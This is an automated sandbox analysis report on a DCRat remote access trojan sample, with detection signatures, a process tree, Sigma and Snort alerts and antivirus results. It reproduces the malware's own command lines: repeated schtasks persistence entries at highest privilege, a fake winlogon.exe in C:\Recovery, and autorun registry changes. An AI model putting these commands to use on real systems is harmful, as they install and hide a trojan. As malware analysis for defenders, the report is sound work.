Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
H9gMIu2HXi.exe

Overview

General Information

Sample name:H9gMIu2HXi.exe
renamed because original name is a hash value
Original sample name:4fb1d8f8dff638f2c9b382f9552b18e2.bin.exe
Analysis ID:1417539
MD5:4fb1d8f8dff638f2c9b382f9552b18e2
SHA1:5bc4dbad7914ceb72dba45d1b1efffba40143653
SHA256:b706a1a67f20b5e029c058de6a1e681a36fea762f69b9d983921d0e47ec2bc6c
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Snort IDS alert for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • H9gMIu2HXi.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\H9gMIu2HXi.exe" MD5: 4FB1D8F8DFF638F2C9B382F9552B18E2)
    • cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • work.exe (PID: 7588 cmdline: work.exe -priverdD MD5: E0A16200BD098799073FCB05E9D31300)
        • dwartg.exe (PID: 7628 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe" MD5: 1C051E7154F24C6BEA5788CBE9DCB478)
          • wscript.exe (PID: 7680 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
            • cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • SurrogatewebSession.exe (PID: 7784 cmdline: "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe" MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
                • schtasks.exe (PID: 7836 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7860 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7884 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • csc.exe (PID: 7900 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                  • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • cvtres.exe (PID: 7984 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
                • schtasks.exe (PID: 8024 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8064 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8096 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8120 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8148 cmdline: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8172 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7172 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7236 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7268 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7292 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 2564 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 1804 cmdline: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 6488 cmdline: schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7388 cmdline: schtasks.exe /create /tn "SurrogatewebSession" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 4304 cmdline: schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • cmd.exe (PID: 7596 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • chcp.com (PID: 7528 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                  • w32tm.exe (PID: 7696 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                  • SurrogatewebSession.exe (PID: 7916 cmdline: "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe" MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • vXKtedDiKZHKptbUFqIBdHmZ.exe (PID: 7948 cmdline: "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe" MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • vXKtedDiKZHKptbUFqIBdHmZ.exe (PID: 7964 cmdline: "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe" MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • SurrogatewebSession.exe (PID: 7552 cmdline: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • SurrogatewebSession.exe (PID: 7556 cmdline: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • winlogon.exe (PID: 7568 cmdline: C:\Recovery\winlogon.exe MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • winlogon.exe (PID: 7532 cmdline: C:\Recovery\winlogon.exe MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • vXKtedDiKZHKptbUFqIBdHmZ.exe (PID: 7264 cmdline: "C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe" MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
  • winlogon.exe (PID: 7832 cmdline: "C:\Recovery\winlogon.exe" MD5: 1F994BA149832A45EBEDCE2D36A2CA21)
    • cmd.exe (PID: 7260 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Recovery\winlogon.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          C:\Recovery\winlogon.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000008.00000000.1663208372.0000000000BC2000.00000002.00000001.01000000.0000000D.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              00000004.00000003.1624273489.0000000006FB2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                00000004.00000003.1624823463.0000000004F0D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000004.00000003.1623801206.00000000066A6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000003.00000003.1620690565.0000000004F96000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Click to see the 3 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      8.0.SurrogatewebSession.exe.bc0000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        4.3.dwartg.exe.66f46d6.0.raw.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          4.3.dwartg.exe.70006d6.1.raw.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                            4.3.dwartg.exe.70006d6.1.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                              4.3.dwartg.exe.66f46d6.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Files With System Process Name In Unsuspected Locations
                                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ProcessId: 7784, TargetFilename: C:\Recovery\winlogon.exe
                                Sigma detected: System File Execution Location Anomaly
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\winlogon.exe, CommandLine: C:\Recovery\winlogon.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\winlogon.exe, NewProcessName: C:\Recovery\winlogon.exe, OriginalFileName: C:\Recovery\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\winlogon.exe, ProcessId: 7568, ProcessName: winlogon.exe
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, ParentProcessId: 7628, ParentProcessName: dwartg.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" , ProcessId: 7680, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ProcessId: 7784, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\vXKtedDiKZHKptbUFqIBdHmZ
                                Sigma detected: CurrentVersion NT Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ProcessId: 7784, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe", ParentImage: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ParentProcessId: 7784, ParentProcessName: SurrogatewebSession.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline", ProcessId: 7900, ProcessName: csc.exe
                                Sigma detected: Remote Thread Creation By Uncommon Source Image
                                Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Recovery\winlogon.exe, SourceProcessId: 7532, StartAddress: FB11FF80, TargetImage: C:\Windows\SysWOW64\cmd.exe, TargetProcessId: 7532
                                Sigma detected: Suspicious Add Scheduled Task Parent
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f, CommandLine: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe", ParentImage: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ParentProcessId: 7784, ParentProcessName: SurrogatewebSession.exe, ProcessCommandLine: schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f, ProcessId: 7836, ProcessName: schtasks.exe
                                Sigma detected: Suspicious Schtasks From Env Var Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /f, CommandLine: schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe", ParentImage: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ParentProcessId: 7784, ParentProcessName: SurrogatewebSession.exe, ProcessCommandLine: schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /f, ProcessId: 6488, ProcessName: schtasks.exe
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, ParentProcessId: 7628, ParentProcessName: dwartg.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" , ProcessId: 7680, ProcessName: wscript.exe
                                Sigma detected: Dynamic CSharp Compile Artefact
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ProcessId: 7784, TargetFilename: C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline
                                Sigma detected: Windows Processes Suspicious Parent Directory
                                Source: Process startedAuthor: vburov: Data: Command: C:\Recovery\winlogon.exe, CommandLine: C:\Recovery\winlogon.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\winlogon.exe, NewProcessName: C:\Recovery\winlogon.exe, OriginalFileName: C:\Recovery\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\winlogon.exe, ProcessId: 7568, ProcessName: winlogon.exe

                                Data Obfuscation

                                barindex
                                Sigma detected: Dot net compiler compiles file from suspicious location
                                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe", ParentImage: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ParentProcessId: 7784, ParentProcessName: SurrogatewebSession.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline", ProcessId: 7900, ProcessName: csc.exe

                                Persistence and Installation Behavior

                                barindex
                                Sigma detected: Schedule system process
                                Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /f, CommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe", ParentImage: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, ParentProcessId: 7784, ParentProcessName: SurrogatewebSession.exe, ProcessCommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /f, ProcessId: 8120, ProcessName: schtasks.exe

                                Snort Signatures

                                Timestamp:03/29/24-15:27:21.388590
                                SID:2048095
                                Source Port:49739
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for dropped file
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Users\user\Desktop\BudDliLc.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                Source: C:\Users\user\Desktop\LdxTVLQK.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\Users\user\Desktop\MFrsFgjH.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\Users\user\AppData\Local\Temp\NZDl7DWO67.batAvira: detection malicious, Label: BAT/Runner.IL
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Recovery\winlogon.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Users\user\Desktop\vybNluDs.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                Multi AV Scanner detection for dropped file
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeReversingLabs: Detection: 70%
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeReversingLabs: Detection: 70%
                                Source: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exeReversingLabs: Detection: 70%
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeReversingLabs: Detection: 70%
                                Source: C:\Recovery\winlogon.exeReversingLabs: Detection: 70%
